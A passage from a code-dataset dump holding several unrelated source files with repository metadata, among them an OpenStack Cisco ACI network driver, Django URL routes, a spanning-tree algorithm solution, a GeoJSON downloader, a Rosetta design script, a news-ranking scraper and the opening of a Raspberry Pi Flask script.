networking_aci.plugins.ml2.drivers.mech_aci import allocations_manager as allocations\nfrom networking_aci.plugins.ml2.drivers.mech_aci import common\nfrom networking_aci.plugins.ml2.drivers.mech_aci import constants as aci_const\nfrom networking_aci.plugins.ml2.drivers.mech_aci import exceptions as aci_exc\nfrom networking_aci.plugins.ml2.drivers.mech_aci.config import ACI_CONFIG, CONF\nfrom networking_aci.plugins.ml2.drivers.mech_aci import rpc_api\nfrom networking_aci.plugins.ml2.drivers.mech_aci.trunk import ACITrunkDriver\n\nLOG = logging.getLogger(__name__)\n\n\n@registry.has_registry_receivers\nclass CiscoACIMechanismDriver(api.MechanismDriver):\n def __init__(self):\n LOG.info(_LI(\"ACI mechanism driver initializing...\"))\n self.topic = None\n self.conn = None\n self._plugin_property = None\n self.db = common.DBPlugin()\n self.rpc_api = rpc_api.AgentRpcCallback(self.db)\n self.allocations_manager = allocations.AllocationsManager(self.db)\n\n ACI_CONFIG.db = self.db\n self.rpc_notifier = rpc_api.ACIRpcClientAPI()\n self.trunk_driver = ACITrunkDriver.create()\n self.vif_details = {\n portbindings.VIF_DETAILS_CONNECTIVITY: self.connectivity\n }\n\n def initialize(self):\n pass\n\n @property\n def connectivity(self):\n return portbindings.CONNECTIVITY_L2\n\n @property\n def _plugin(self):\n if self._plugin_property is None:\n self._plugin_property = directory.get_plugin()\n return self._plugin_property\n\n def _setup_rpc(self):\n \"\"\"Initialize components to support agent communication.\"\"\"\n self.endpoints = [\n self.rpc_api,\n ]\n\n @log_helpers.log_method_call\n def start_rpc_listeners(self):\n \"\"\"Start the RPC loop to let the plugin communicate with agents.\"\"\"\n self._setup_rpc()\n self.topic = aci_const.ACI_TOPIC\n self.conn = n_rpc.Connection()\n self.conn.create_consumer(self.topic, self.endpoints, fanout=False)\n\n return self.conn.consume_in_threads()\n\n def get_workers(self):\n return [service.RpcWorker([self], worker_process_count=0)]\n\n def bind_port(self, context):\n port = context.current\n host = common.get_host_from_profile(context.current.get('binding:profile'), context.host)\n\n LOG.debug(\"Using binding host %s for binding port %s\", host, port['id'])\n hostgroup_name, hostgroup = ACI_CONFIG.get_hostgroup_by_host(context._plugin_context, host)\n\n if not hostgroup:\n LOG.warning(\"No aci config found for binding host %s while binding port %s\", host, port['id'])\n return\n\n if hostgroup['fabric_transit']:\n raise aci_exc.TransitBindingProhibited(port_id=port['id'], host=host)\n\n if len(context.segments_to_bind) < 1:\n LOG.warning(\"No segments found for port %s with host %s - very unusual\", port['id'], host)\n return\n\n # direct baremetal-on-aci needs to be annotated with physnet (and other stuff)\n if hostgroup['direct_mode']:\n ACI_CONFIG.annotate_baremetal_info(context._plugin_context, hostgroup, context.network.current['id'],\n override_project_id=port['project_id'])\n\n # hierarchical or direct?\n if not context.binding_levels:\n self._bind_port_hierarchical(context, port, hostgroup_name, hostgroup)\n elif hostgroup['finalize_binding'] or \\\n (hostgroup['direct_mode'] and\n hostgroup['hostgroup_mode'] in (aci_const.MODE_BAREMETAL, aci_const.MODE_INFRA)):\n # direct binding for a) baremetal on aci and b) infra mode (2nd level)\n self._bind_port_direct(context, port, hostgroup_name, hostgroup)\n\n def _bind_port_hierarchical(self, context, port, hostgroup_name, hostgroup):\n # find the top segment (no physnet, type vxlan); there should be only one, but who knows\n for segment in context.segments_to_bind:\n if segment[api.NETWORK_TYPE] == 'vxlan' and segment['physical_network'] is None:\n break\n else:\n LOG.error(\"No usable segment found for hierarchical portbinding, candidates were: %s\",\n context.segments_to_bind)\n return\n\n segment_physnet = hostgroup.get('physical_network')\n if not segment_physnet:\n LOG.error(\"Cannot bind port %s: Hostgroup %s has no physical_network set, cannot allocate segment\",\n port['id'], hostgroup_name)\n return\n\n # For now we assume only two levels in hierarchy. The top level VXLAN/VLAN and\n # one dynamically allocated segment at level 1\n level = 1\n\n network = context.network.current\n segment_type = hostgroup.get('segment_type', 'vlan')\n if hostgroup.get('hostgroup_mode') != aci_const.MODE_BAREMETAL:\n # VM mode\n allocation = self.allocations_manager.allocate_segment(network, segment_physnet, level, hostgroup)\n segmentation_id = allocation.segmentation_id\n segment_id = allocation.segment_id\n else:\n # baremetal objects use a different physnet and gets allocated to its own segment\n # check that no baremetal-on-aci port from another project is in this network\n segment_prefix = \"{}-\".format(CONF.ml2_aci.baremetal_resource_prefix)\n for seg_port in self.db.get_ports_on_network_by_physnet_prefix(context._plugin_context,\n network['id'], segment_prefix):\n if seg_port['project_id'] != port['project_id']:\n msg = (\"Cannot bind port {}: Hostgroup {} has baremetal port {} belonging to project {}, \"\n \"new port is from project {} - aborting binding\"\n .format(port['id'], hostgroup['name'], seg_port['port_id'], seg_port['project_id'],\n port['project_id']))\n LOG.error(msg)\n raise n_exc.NeutronException(msg)\n\n ACI_CONFIG.annotate_baremetal_info(context._plugin_context, hostgroup, network['id'],\n override_project_id=port['project_id'])\n if aci_const.TRUNK_PROFILE in port['binding:profile']:\n segmentation_id = port['binding:profile'][aci_const.TRUNK_PROFILE].get('segmentation_id', 1)\n else:\n segmentation_id = None # let the allocater choose a vlan\n allocation = self.allocations_manager.allocate_baremetal_segment(context._plugin_context, network,\n hostgroup, level, segmentation_id)\n segment_id = allocation.id\n segmentation_id = allocation.segmentation_id\n\n if not allocation:\n LOG.error(\"Binding failed, could not allocate a segment for further binding levels \"\n \"for port %(port)s\",\n {'port': context.current['id']})\n return\n\n next_segment = {\n 'segmentation_id': segmentation_id,\n 'network_id': network['id'],\n 'network_type': segment_type,\n 'physical_network': segment_physnet,\n 'id': segment_id,\n 'is_dynamic': False,\n 'segment_index': level\n }\n\n LOG.info(\"Next segment to bind for port %s on %s: %s\", port['id'], segment[\"id\"], next_segment)\n if not hostgroup['direct_mode']:\n # for direct mode the rpc call will be made by the next level binding\n ACI_CONFIG.clean_bindings(context._plugin_context, hostgroup, allocation.segment_id, level=level)\n self.rpc_notifier.bind_port(context._plugin_context, port, hostgroup, segment, next_segment)\n context.continue_binding(segment[\"id\"], [next_segment])\n\n def _bind_port_direct(self, context, port, hostgroup_name, hostgroup):\n segment_physnet = hostgroup.get('physical_network')\n\n for segment in context.segments_to_bind:\n if segment[api.PHYSICAL_NETWORK] == segment_physnet:\n vif_details = {\n 'aci_directly_bound': True,\n }\n next_segment = {\n 'segmentation_id': segment['segmentation_id'],\n }\n if not hostgroup['finalize_binding']:\n # annotate baremetal resource name for baremetal group (if necessary)\n network = context.network.current\n ACI_CONFIG.annotate_baremetal_info(context._plugin_context, hostgroup, network['id'],\n override_project_id=port['project_id'])\n\n if hostgroup['hostgroup_mode'] == aci_const.MODE_BAREMETAL and \\\n aci_const.TRUNK_PROFILE in port['binding:profile']:\n port_type_str = \"trunk port\"\n else:\n port_type_str = \"access port\"\n\n self.rpc_notifier.bind_port(context._plugin_context, port, hostgroup, segment, next_segment)\n else:\n port_type_str = \"finalized portbinding w/o direct-mode set\"\n vif_details['aci_finalized_binding'] = True\n context.set_binding(segment['id'], aci_const.VIF_TYPE_ACI, vif_details, n_const.ACTIVE)\n LOG.info(\"Directly bound port %s to hostgroup %s with segment %s vlan %s (%s)\",\n port['id'], hostgroup_name, segment['id'], segment['segmentation_id'], port_type_str)\n\n return\n\n LOG.error(\"ACI driver tried to directly bind port %s to segment %s, but it could not be found, options: %s\",\n port['id'], segment_physnet,\n \", \".join(seg[api.PHYSICAL_NETWORK] for seg in context.segments_to_bind))\n\n # Network callbacks\n def create_network_precommit(self, context):\n az_hints = context.current.get(az_def.AZ_HINTS)\n if len(az_hints) > 1:\n raise aci_exc.OnlyOneAZHintAllowed()\n\n def create_network_postcommit(self, context):\n external = self._network_external(context)\n self.rpc_notifier.create_network(context._plugin_context, context.current, external=external)\n\n def delete_network_postcommit(self, context):\n self.rpc_notifier.delete_network(context._plugin_context, context.current)\n\n def create_subnet_postcommit(self, context):\n if not CONF.ml2_aci.handle_all_l3_gateways or \\\n aci_const.CC_FABRIC_L3_GATEWAY_TAG in context.network.current['tags']:\n return\n\n address_scope_name = None\n\n network = context._plugin.get_network(context._plugin_context, context.current['network_id'])\n external = bool(network.get('router:external'))\n network_az = None\n if network.get(az_def.AZ_HINTS):\n network_az = network[az_def.AZ_HINTS][0]\n\n if external:\n subnetpool_id = context.current['subnetpool_id']\n\n if subnetpool_id is None:\n # TODO Set network to Down\n LOG.warn(_LW(\"Subnet {} is attached to an external network but is not using a subnet pool, \"\n \"further configuration of this network in ACI is not possible\"\n .format(context.current['id'])))\n return\n\n address_scope_name = self.db.get_address_scope_name(context._plugin_context, subnetpool_id)\n if address_scope_name is None:\n # TODO Set network to Down\n LOG.warn(_LW(\"Subnet {} is attached to an external network but in an address scope, \"\n \"further configuration of this network in ACI is not possible\"\n .format(context.current['id'])))\n return\n\n self.rpc_notifier.create_subnet(context._plugin_context, context.current, external=external,\n address_scope_name=address_scope_name, network_az=network_az)\n\n def delete_subnet_postcommit(self, context):\n if not CONF.ml2_aci.handle_all_l3_gateways or \\\n aci_const.CC_FABRIC_L3_GATEWAY_TAG in context.network.current['tags']:\n return\n\n network_id = context.current['network_id']\n subnetpool_id = context.current['subnetpool_id']\n if subnetpool_id is None:\n LOG.warn(_LW(\"Subnet {} is attached to an external network but is not using a subnet pool, \"\n \"further configuration of this network in ACI is not possible\"\n .format(context.current['id'])))\n return\n\n address_scope_name = self.db.get_address_scope_name(context._plugin_context, subnetpool_id)\n network = context._plugin.get_network(context._plugin_context, network_id)\n external = bool(network.get('router:external'))\n network_az = None\n if network.get(az_def.AZ_HINTS):\n network_az = network[az_def.AZ_HINTS][0]\n subnets = context._plugin.get_subnets_by_network(context._plugin_context, network_id)\n last_on_network = len(subnets) == 0\n self.rpc_notifier.delete_subnet(context._plugin_context, context.current, external=external,\n address_scope_name=address_scope_name, network_az=network_az,\n last_on_network=last_on_network)\n\n @registry.receives(aci_const.CC_FABRIC_TRANSIT, [events.AFTER_CREATE])\n def on_fabric_transit_created(self, resource, event, trigger, payload):\n network_id = payload.metadata['network_id']\n host = payload.metadata['host']\n LOG.info(\"Got transit creation notification for transit host %s network %s, syncing network\",\n host, network_id)\n\n # get network sync data\n try:\n network = self._plugin.get_network(payload.context, network_id)\n except n_exc.NetworkNotFound as e:\n LOG.error(\"Could not sync transit %s network %s - network does not exist! (Error was %s)\",\n host, network_id, e)\n return\n\n sync_data = self.rpc_api._get_network(payload.context, network)\n\n # send to agent\n self.rpc_notifier.sync_network(payload.context, sync_data)\n\n @registry.receives(aci_const.CC_FABRIC_NET_GW, [events.BEFORE_UPDATE])\n def on_network_gateway_move(self, resource, event, trigger, payload):\n network_id = payload.metadata['network_id']\n if not payload.metadata['move-to-cc-fabric']:\n LOG.warning(\"Moving a gateway _away_ from cc-fabric is not supported by ACI yet (for network %s)\",\n network_id)\n return\n\n LOG.info(\"Got request to move l3 gateway away from ACI for network %s\", network_id)\n\n try:\n network = self._plugin.get_network(payload.context, network_id)\n except n_exc.NetworkNotFound as e:\n LOG.error(\"Could not find network %s - network does not exist! (Error was %s)\",\n network_id, e)\n return\n\n if not network[extnet_def.EXTERNAL]:\n LOG.error(\"Got event to move gateway of network %s, which is NOT an external network!\", network_id)\n return\n\n subnets_to_delete = []\n for subnet_id in network['subnets']:\n subnet = self._plugin.get_subnet(payload.context, subnet_id)\n subnetpool_id = subnet['subnetpool_id']\n address_scope_name = self.db.get_address_scope_name(payload.context, subnetpool_id)\n if address_scope_name is None:\n continue\n subnets_to_delete.append((subnet, address_scope_name))\n\n for n, (subnet, address_scope_name) in enumerate(subnets_to_delete):\n last_on_network = n + 1 == len(network['subnets'])\n self.rpc_notifier.delete_subnet(payload.context, subnet, external=True,\n address_scope_name=address_scope_name, last_on_network=last_on_network)\n\n # Port callbacks\n def create_port_precommit(self, context):\n self._check_port_az_affinity(context._plugin_context, context.network.current, context.current)\n\n def update_port_precommit(self, context):\n # only check AZ again if binding host changed\n orig_host = common.get_host_from_profile(context.original['binding:profile'],\n context.original['binding:host_id'])\n curr_host = common.get_host_from_profile(context.current['binding:profile'],\n context.current['binding:host_id'])\n if orig_host != curr_host:\n curr_hostgroup_name, curr_hostgroup = ACI_CONFIG.get_hostgroup_by_host(context._plugin_context, curr_host)\n if curr_hostgroup_name is not None:\n self._check_port_az_affinity(context._plugin_context, context.network.current, context.current)\n\n def _check_port_az_affinity(self, context, network, port):\n host = common.get_host_from_profile(port['binding:profile'], port['binding:host_id'])\n hostgroup_name, hostgroup = ACI_CONFIG.get_hostgroup_by_host(context, host)\n if not hostgroup:\n return # ignore unknown binding_hosts\n\n # no checks are done for external networks, as these can be stretched across AZs\n if network[extnet_def.EXTERNAL]:\n return\n\n az_hints = network.get(az_def.AZ_HINTS)\n if az_hints:\n az_hint = az_hints[0]\n hg_az = [hostgroup['host_azs'][host]] if host in hostgroup['host_azs'] else hostgroup['availability_zones']\n if len(hg_az) > 1 or az_hint != hg_az[0]:\n exc = aci_exc.HostgroupNetworkAZAffinityError(port_id=port['id'], hostgroup_name=hostgroup_name,\n host=host, hostgroup_az=\", \".join(hg_az),\n network_az=az_hint)\n if CONF.ml2_aci.az_checks_enabled:\n raise exc\n else:\n LOG.warning(\"Binding port with non-matching AZ: %s\", exc)\n\n def update_port_postcommit(self, context):\n orig_host = common.get_host_from_profile(context.original['binding:profile'],\n context.original['binding:host_id'])\n curr_host = common.get_host_from_profile(context.current['binding:profile'],\n context.current['binding:host_id'])\n\n if orig_host != curr_host:\n # binding host differs, find out if:\n # * old binding host is valid\n # * new binding host is either invalid or valid AND belongs to a diffrent hostgroup\n orig_hostgroup_name, orig_hostgroup = ACI_CONFIG.get_hostgroup_by_host(context._plugin_context, orig_host)\n curr_hostgroup_name, curr_hostgroup = ACI_CONFIG.get_hostgroup_by_host(context._plugin_context, curr_host)\n\n if orig_hostgroup and \\\n (curr_hostgroup is None or (curr_hostgroup and orig_hostgroup_name != curr_hostgroup_name)):\n if CONF.ml2_aci.handle_port_update_for_non_baremetal or \\\n orig_hostgroup['direct_mode'] and orig_hostgroup['hostgroup_mode'] == aci_const.MODE_BAREMETAL:\n # handle port update\n LOG.info('Calling cleanup for port %s (hostgroup transition from \"%s\" to \"%s\")',\n context.current['id'], orig_hostgroup_name, curr_hostgroup_name)\n\n # apparently context.network.original is not set, but the ml2_plugin always fetches\n # the original port's network, so context.current should work. nevertheless, safeguarding this\n if context.original['network_id'] != context.network.current['id']:\n LOG.error(\"Port %s original port has network id %s, context.network.current is %s, omitting!\",\n context.current['id'], context.current['network_id'], context.network.current['id'])\n return\n\n self.cleanup_segment_if_needed(context._plugin_context, context.original, context.network.current,\n context.original_binding_levels,\n context.original_bottom_bound_segment)\n else:\n LOG.info(\"Ignoring host transition for port %s from host %s hostgroups %s to host %s hostgroup %s\",\n context.current['id'], orig_host, orig_hostgroup_name, curr_host, curr_hostgroup_name)\n\n def delete_port_postcommit(self, context):\n # For now we look only at the bottom bound segment - works for this use case\n # but will need some review if we ever have several dynamically bound segements\n # network_id = context.network.current['id']\n self.cleanup_segment_if_needed(context._plugin_context, context.current, context.network.current,\n context.binding_levels, context.bottom_bound_segment)\n\n def cleanup_segment_if_needed(self, context, port, network, binding_levels, segment):\n if not segment:\n return\n\n # only handle cleanup for ports bound by the aci driver as top segment\n if not binding_levels or binding_levels[0][api.BOUND_DRIVER] != aci_const.ACI_DRIVER_NAME:\n return\n\n host = common.get_host_from_profile(port['binding:profile'], port['binding:host_id'])\n _, hostgroup = ACI_CONFIG.get_hostgroup_by_host(context, host)\n if not hostgroup:\n return\n\n # Get segment from ml2_port_binding_levels based on segment_id and host\n # if no ports on this segment for host we can remove the aci allocation.\n # In baremetal mode we need to call cleanup when the hostgroup is no longer on the physnet\n released = self.allocations_manager.release_segment(network, hostgroup, 1, segment)\n if not (released or hostgroup['direct_mode']):\n return\n\n # Call to ACI to delete port if the segment is released i.e.\n # port is the last for the network one on the host\n # Check if physical domain should be cleared\n ACI_CONFIG.annotate_baremetal_info(context, hostgroup, network['id'], override_project_id=port['project_id'])\n clearable_physdoms = []\n if released:\n # physdoms will only be removed on segment removal\n clearable_physdoms = self._get_clearable_phys_doms(context, network['id'],\n segment, hostgroup, port['project_id'])\n\n clearable_bm_entities = []\n reset_bindings_to_infra = False\n if hostgroup['direct_mode']:\n # if this hostgroup has hosts left we cancel the removal\n hosts_on_network = self.db.get_hosts_on_network(context, network['id'], level=1)\n if any(host in hosts_on_network for host in hostgroup['hosts']):\n return\n\n # if this is a infra-mode binding make sure no VM port is bound before removing it\n # (this should never be the case)\n if hostgroup['hostgroup_mode'] == aci_const.MODE_INFRA:\n parent_hostgroup = ACI_CONFIG.get_hostgroup(context, hostgroup['parent_hostgroup'])\n if any(host in hosts_on_network for host in parent_hostgroup['hosts']):\n # parent group has still a binding, we might have set one of the VPCs to access mode\n # therefore we need to resync the binding. As this might interfere with other ports\n # joining/leaving the network we do a network sync here\n ACI_CONFIG.clean_bindings(context, parent_hostgroup, segment['id'], level=1)\n LOG.debug(\"Port %s in network %s is in hostgroup %s, parent hostgroup %s, which needs a resync, \"\n \"as this network has the parent hostgroup as member, but not the child anymore\",\n port['id'], network['id'], hostgroup['name'], parent_hostgroup['name'])\n\n self.rpc_notifier.sync_network_id(context, network['id'])\n return\n\n if hostgroup['direct_mode'] and hostgroup['hostgroup_mode'] == aci_const.MODE_BAREMETAL:\n # if this hostgroup has no host left on the physnet we can reset the VPC/bindings\n hosts_on_physnet = self.db.get_hosts_on_physnet(context, hostgroup['physical_network'], level=1)\n if not any(host in hosts_on_physnet for host in hostgroup['hosts']):\n reset_bindings_to_infra = True\n\n # if this port is the last from a project we clear out the bm entities on ACI\n seg_prefix = ACI_CONFIG.baremetal_resource_prefix\n projects_on_physnets = self.db.get_bound_projects_by_physnet_prefix(context, seg_prefix)\n if port['project_id'] not in projects_on_physnets:\n clearable_bm_entities.append(ACI_CONFIG.gen_bm_resource_name(port['project_id']))\n\n LOG.debug(\"Sending RPC delete_port for port %s hostgroup %s with clearable physdoms %s \"\n \"clearable bm-entities %s and reset-bindings-to-infra %s\",\n port['id'], hostgroup['name'], clearable_physdoms, clearable_bm_entities, reset_bindings_to_infra)\n self.rpc_notifier.delete_port(context, port, hostgroup, clearable_physdoms, clearable_bm_entities,\n reset_bindings_to_infra)\n\n def _get_clearable_phys_doms(self, context, network_id, local_segment, host_config, project_id):\n clearable_physdoms = set(host_config['physical_domain'])\n for other_segment in common.get_segments(context, network_id):\n if other_segment['physical_network'] is None:\n continue\n other_physdoms = ACI_CONFIG.get_physdoms_by_physnet(context, other_segment['physical_network'], network_id,\n project_id)\n if not other_physdoms:\n LOG.warning(\"No config found for segment %s physical network %s in network %s\",\n local_segment['id'], other_segment['physical_network'], network_id)\n continue\n other_physdoms = set(other_physdoms)\n for physdom in clearable_physdoms & other_physdoms:\n LOG.debug(\"Not clearing physdom %s from epg %s for segment %s as it is still in use by segment %s\",\n physdom, network_id, local_segment['id'], other_segment['id'])\n clearable_physdoms -= other_physdoms\n if not clearable_physdoms:\n break\n\n LOG.debug(\"Found %d clearable physdoms for network %s segment %s (%s)\",\n len(clearable_physdoms), network_id, local_segment['id'],\n \", \".join(clearable_physdoms) or \"\")\n\n return clearable_physdoms\n\n @staticmethod\n def _network_external(context):\n current = context.current\n network_id = current['id']\n network = context._plugin.get_network(context._plugin_context, network_id)\n\n if network.get('router:external'):\n return True\n\n return False\n\n @staticmethod\n def _get_subnet_pool_name(context, subnet_pool_id):\n pool = context._plugin.get_subnetpool(context._plugin_context, subnet_pool_id)\n\n if not pool:\n LOG.warn(_LW(\"Pool {} does not exist\".format(subnet_pool_id)))\n return\n\n return pool['name']\n","repo_name":"sapcc/networking-aci","sub_path":"networking_aci/plugins/ml2/drivers/mech_aci/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":28707,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"43092735961","text":"\nfrom django.urls import path ,include\nfrom . import views\n\napp_name='tracksapp'\n\nurlpatterns = [\n \n path('',views.track_list, name = 'track_list'),\n path('tracks/',views.track_detail, name = 'track_detail'),\n\n]","repo_name":"hasnaa-elgammal/Sahelha","sub_path":"Backend-master/tracksapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18537929245","text":"# 네트워크 연결 G4\n# 스패닝트리(신장트리): 그래프의 최소 연결 부분 그래프\n# - 그래프에서 일부 간선을 선택해서 만든 트리\n# - n개의 정점을 가지는 그래프의 최소 간선의 수는 n-1개, n-1개의 간선으로 연결\n# - 사이클 포함x, 모든 정점이 연결\n# 최소스패닝트리: 신장트리 중 사용된 간선들의 가중치 합이 최소인 트리\nimport sys\n\ninput = sys.stdin.readline\nn = int(input())\nm = int(input())\ngraph = []\nparent = [i for i in range(n + 1)]\nresult = 0\n\nfor i in range(m):\n a, b, c = map(int, input().split())\n graph.append([c, a, b])\n\n\ndef find(a):\n if parent[a] == a: # 자신이 루트노드면 자신을 반환\n return a\n parent[a] = find(parent[a]) # 재귀적으로 a의 부모노드를 갱신\n return parent[a]\n\n\ndef union(a, b): # a, b를 병합\n a = find(a) # a의 부모 노드 탐색\n b = find(b) # b의 부모 노드 탐색\n if b < a:\n parent[a] = b\n else:\n parent[b] = a\n\n\ngraph.sort(key=lambda x: x[0]) # 가중치로 정렬\nfor dist, a, b in graph:\n if find(a) != find(b): # a, b의 부모노드가 다르면\n union(a, b) # a, b를 병합\n result += dist # 비용 갱신\nprint(result)\n","repo_name":"kkm0406/AlgorithmBOJ","sub_path":"그래프/1922.py","file_name":"1922.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71995802724","text":"# download.py\n\nimport json\nimport os\nimport requests\nimport urllib\n\n\nFILE_CATALOG = 'data/japan_prefecture_geojson_catalog.json'\n\nDIR = 'geojson_down'\n\n\nif not os.path.isdir(DIR):\n os.mkdir(DIR)\n#\n\n\nwith open(FILE_CATALOG , 'r') as f1:\n dic1 = json.load(f1)\n#\n\nurl_raw_base = dic1['url_raw_base']\nlist_prefectures = dic1['prefectures']\n\n\nfor item in list_prefectures:\n name_ja = item['name_ja']\n filename = item['filename']\n print(name_ja)\n url_geojson = urllib.parse.urljoin(url_raw_base, filename)\n save_path = os.path.join(DIR, filename)\n data = requests.get(url_geojson).content\n with open(save_path ,mode='wb') as f2:\n f2.write(data)\n#\n","repo_name":"ohwada/World_Countries","sub_path":"geoPandas/polygon_largest/japan_prefectures/python/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15394537817","text":"from django.urls import path\nfrom . import views\n\napp_name = 'stats'\nurlpatterns = [\n\t# ex: /stats/\n\tpath('', views.index, name='index'),\n\t# ex: /stats/team/\n\tpath('team/', views.team, name='team'),\n\t# ex: /stats/player/\n\tpath('players/', views.players, name='players'),\n\t# ex: /stats/locations/\n\tpath('locations/', views.locations, name='locations'),\n\t# Ajax to get seasons\n\tpath('ajax/getseasons/', views.getSeasons, name='getseasons'),\n\t# Ajax to get skaters\n\tpath('ajax/getskaters/', views.getSkaters, name='getskaters'),\n]","repo_name":"bonhamdaniel/hockey-stats","sub_path":"benchwarmer/stats/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73796753125","text":"# nate 뉴스 ranking\n# https://news.nate.com/rank/interest?sc=ent 랭킹 뉴스 추출\n# 제목, 기사제공자, 날짜 ( 1 ~ 50 위)\n\nimport requests\nfrom bs4 import BeautifulSoup\n\nres = requests.get(\"https://news.nate.com/rank/interest?sc=ent\")\nsoup = BeautifulSoup(res.text, \"lxml\")\n\ntop = soup.select(\".mduSubjectList > div\")\n# print(top)\n\nfor idx, data in enumerate(top, 1):\n # 타이틀\n title = data.select_one(\"a strong\")\n media = data.select_one(\"span.medium\")\n print(\"{} . {} :: {}\".format(idx, title.get_text(), media.get_text()[:-10]))\n\nrow = soup.select(\".mduSubject > li\")\n# print(top)\n\nfor idx, data in enumerate(row, 1):\n # 타이틀\n title = data.select_one(\"a\")\n media = data.select_one(\"span.medium\")\n print(\"{} . {} :: {}\".format(idx + 5, title.get_text(), media.get_text()))\n","repo_name":"ycr5007/SolDesk","sub_path":"PythonSource/RPAbasic/crawl/beautifulsoup/11-1_ranking.py","file_name":"11-1_ranking.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74258582565","text":"#!/usr/bin/python3\nimport argparse\nimport math\nimport os\nfrom pyrosetta import *\nfrom pyrosetta.rosetta.core.chemical import ResidueProperty\nfrom pyrosetta.rosetta.core.select.residue_selector import \\\n AndResidueSelector, NotResidueSelector, OrResidueSelector, \\\n ResidueIndexSelector, ResiduePropertySelector, ChainSelector, \\\n NeighborhoodResidueSelector, InterGroupInterfaceByVectorSelector\n\ndef detect_inter_group_interface(pose, chains):\n protein_selector = ResiduePropertySelector(ResidueProperty.PROTEIN)\n group1_selector = AndResidueSelector(ChainSelector(chains[0]), protein_selector)\n group2_selector = AndResidueSelector(ChainSelector(chains[1]), protein_selector)\n interface_selector = InterGroupInterfaceByVectorSelector()\n interface_selector.group1_selector(group1_selector)\n interface_selector.group2_selector(group2_selector)\n group1_interface_selector = AndResidueSelector(interface_selector, group1_selector)\n group2_interface_selector = AndResidueSelector(interface_selector, group2_selector)\n group1_interface_vector = group1_interface_selector.apply(pose)\n group2_interface_vector = group2_interface_selector.apply(pose)\n return group1_interface_vector, group2_interface_vector\n\ndef convert_vector_to_list(res_vector):\n res_list = list()\n for index, res_bool in enumerate(res_vector):\n if res_bool:\n res_list.append(index + 1)\n return res_list\n\ndef write_position_files(prefix, res_list1, res_list2, workload):\n total_files = math.ceil(len(res_list1) * len(res_list2) / workload)\n pos_2_len = math.ceil(len(res_list2) / total_files)\n for i in range(0, total_files):\n with open(prefix + '_' + str(i + 1) + '.pos', 'w+') as p_pos:\n p_pos.write('N_CST 2\\n')\n p_pos.write('1:')\n for res in res_list1:\n p_pos.write(' ' + str(res))\n p_pos.write('\\n')\n p_pos.write('2:')\n if i < total_files - 1:\n for res in res_list2[i * pos_2_len: (i + 1) * pos_2_len]:\n p_pos.write(' ' + str(res))\n else:\n for res in res_list2[i * pos_2_len:]:\n p_pos.write(' ' + str(res))\n p_pos.write('\\n')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('pdb', type=str)\n parser.add_argument('-chain', type=str, help='Make staples within one chain.')\n parser.add_argument('-chains', type=str, nargs=2, help='Make staples across the interface of two chains.')\n parser.add_argument('-wl', '--workload', type=int, default=1000)\n args = parser.parse_args()\n\n params = list()\n for f in os.listdir():\n if f.endswith('.params'):\n params.append(f)\n if len(params) > 0:\n init('-extra_res_fa ' + ' '.join(params))\n else:\n init()\n pose = pose_from_pdb(args.pdb)\n prefix = args.pdb[args.pdb.rfind('/') + 1:-4]\n i = prefix.find('_')\n if i != -1:\n prefix = args.pdb[:i]\n if args.chain:\n # Residues having the same pdb chain id do not necessarily share the same pose chain id.\n # Convert pdb chain index to pose chain index.\n chain_selector = AndResidueSelector(ChainSelector(args.chain), ResiduePropertySelector(ResidueProperty.PROTEIN))\n chain_vector = chain_selector.apply(pose)\n chain_begin = None\n chain_end = None\n for res_index, res in enumerate(chain_vector):\n if res:\n if not chain_begin:\n chain_begin = res_index + 1\n # chain_index = pose.chain(res_index + 1)\n # break\n else:\n if chain_begin:\n chain_end = res_index\n break\n if not chain_end:\n chain_end = res_index\n # Get the begining and the end position of the chain.\n # chain_begin = pose.chain_begin(chain_index)\n # chain_end = pose.chain_end(chain_index)\n chain_begin_res_list = list(range(chain_begin, chain_begin + 100))\n chain_end_res_list = list(range(chain_end - 99, chain_end + 1))\n prefix += '-' + args.chain\n os.mkdir(prefix)\n write_position_files(prefix + '/' + prefix + '_1', chain_begin_res_list, chain_end_res_list, args.workload)\n write_position_files(prefix + '/' + prefix + '_2', chain_end_res_list, chain_begin_res_list, args.workload)\n elif args.chains:\n group1_interface_vector, group2_interface_vector = detect_inter_group_interface(pose, args.chains)\n group1_interface_list = convert_vector_to_list(group1_interface_vector)\n group2_interface_list = convert_vector_to_list(group2_interface_vector)\n prefix += '-' + args.chains[0] + args.chains[1]\n os.mkdir(prefix)\n write_position_files(prefix + '/' + prefix, group1_interface_list, group2_interface_list, args.workload)\n","repo_name":"ZhuofanShen/Rosetta-Enzyme-Design-Pipeline","sub_path":"scripts-match/generate_position_files.py","file_name":"generate_position_files.py","file_ext":"py","file_size_in_byte":4919,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"15620147940","text":"import time\nfrom RPi import GPIO\nfrom helpers.klasseknop import Button\nimport threading\nfrom multiprocessing import Process, Queue\nfrom smbus import SMBus\nfrom mfrc522 import SimpleMFRC522\nfrom datetime import datetime\n\nfrom flask_cors import CORS\nfrom flask_socketio import SocketIO, emit, send\nfrom flask import Flask, jsonify\nfrom repositories.DataRepository import DataRepository\n\nfrom selenium import webdriver\n\n# from selenium import webdriver\n# from selenium.webdriver.chrome.options import Options\n\ni2c = SMBus(1)\nreader = SimpleMFRC522()\n\nid = Queue()\n# ledPin = 21\n# btnPin = Button(20)\n\n# Code voor Hardware\ndef setup_gpio():\n GPIO.setwarnings(False)\n # GPIO.setmode(GPIO.BCM)\n\n # GPIO.setup(ledPin, GPIO.OUT)\n # GPIO.output(ledPin, 